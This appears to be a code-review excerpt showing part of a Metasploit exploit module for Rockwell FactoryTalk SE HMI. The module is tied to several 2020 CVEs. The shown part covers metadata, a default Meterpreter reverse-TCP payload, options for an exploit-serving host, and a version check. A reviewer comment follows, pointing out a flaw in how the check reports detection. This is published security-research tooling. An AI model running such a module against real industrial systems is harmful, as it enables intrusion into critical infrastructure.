modules/exploits/windows/scada/rockwell_factorytalk_rce.rb

```diff
@@ -0,0 +1,225 @@
+          targets, two information leak vulnerabilities are also abused.
+          This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
+            [ 'URL', 'PEDRO_BLOG'],
+            [ 'URL', 'RADEK_BLOG'],
+            [ 'CVE', '2020-12027'],
+            [ 'CVE', '2020-12028'],
+            [ 'CVE', '2020-12029'],
+            [ 'ZDI', '20-727'],
+            [ 'ZDI', '20-728'],
+            [ 'ZDI', '20-729'],
+            [ 'ZDI', '20-730'],
+          ],
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Payload' => {
+          'DefaultOptions' =>
+            {
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+            }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 20 },
+        'Targets' =>
+          [
+            [ 'Rockwell Automation FactoryTalk SE', {} ]
+          ],
+        'DisclosureDate' => '2020-06-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']),
+        OptInt.new('SRVPORT', [true, 'Connection port for exploit download', 8080]),
+        OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
+      ]
+    )
+  end
+
+  def send_to_factory(uri)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri, uri),
+      'method' => 'GET'
+    })
+    return res
+  end
+
+  def check
+    res = send_to_factory('/hmi_isapi.dll')
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    # Parse version from response body
+    # Example: Version 11.00.00.230
+    version = res.body.match(/Version ([0-9\.]{5,})/)[1].split('.')
+
+    # Is returned version sound?
+    return Exploit::CheckCode::Detected unless version.length == 4
+
+    print_status("#{peer} - Detected version #{version[0]}.#{version[1]}.#{version[2]}.#{version[3]}")
+    if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
+      # we know this exact version is vulnerable (11.00.00.230)
+      return Exploit::CheckCode::Appears
+    end
+  end
```

Comment:
`return Exploit::CheckCode::Detected unless version.length == 4` will return `CheckCode::Detected` for any web server that responds with a 200 status code.

`CheckCode::Appears` is returned only for a specific version. Presumably `CheckCode::Detected` should also be returned if a version was found, but was not `11.00.00.230`.